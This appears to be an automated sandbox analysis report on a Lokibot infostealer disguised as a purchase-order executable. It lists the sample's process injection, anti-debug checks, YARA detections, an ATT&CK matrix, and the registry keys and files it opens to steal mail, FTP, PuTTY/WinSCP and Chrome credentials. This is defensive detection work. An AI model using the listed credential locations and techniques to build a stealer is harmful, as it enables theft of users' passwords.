              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe TID: 7004Thread sleep time: -660000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeAPI call chain: ExitProcess graph end nodegraph_0-3619
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeAPI call chain: ExitProcess graph end nodegraph_0-3616
              Source: nnrr3w4buo.0.drBinary or memory string: YvMcI
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EA56 mov eax, dword ptr fs:[00000030h]0_2_0019EA56
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019E842 mov eax, dword ptr fs:[00000030h]0_2_0019E842
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EB84 mov eax, dword ptr fs:[00000030h]0_2_0019EB84
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EB07 mov eax, dword ptr fs:[00000030h]0_2_0019EB07
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0019EB46 mov eax, dword ptr fs:[00000030h]0_2_0019EB46
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeMemory written: C:\Users\user\Desktop\Purchase Order #5000012803.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe" Jump to behavior
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: Purchase Order #5000012803.exe, 00000001.00000002.923877871.0000000000D70000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405AA7
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: PopPassword1_2_0040D069
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: SmtpPassword1_2_0040D069
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000001.00000003.898744992.00000000006FC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Purchase Order #5000012803.exe PID: 7000, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Input Capture1File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Credentials in Registry2System Information Discovery5SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading11NTDSSecurity Software Discovery11Distributed Component Object ModelInput Capture1Scheduled TransferApplication Layer Protocol113SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

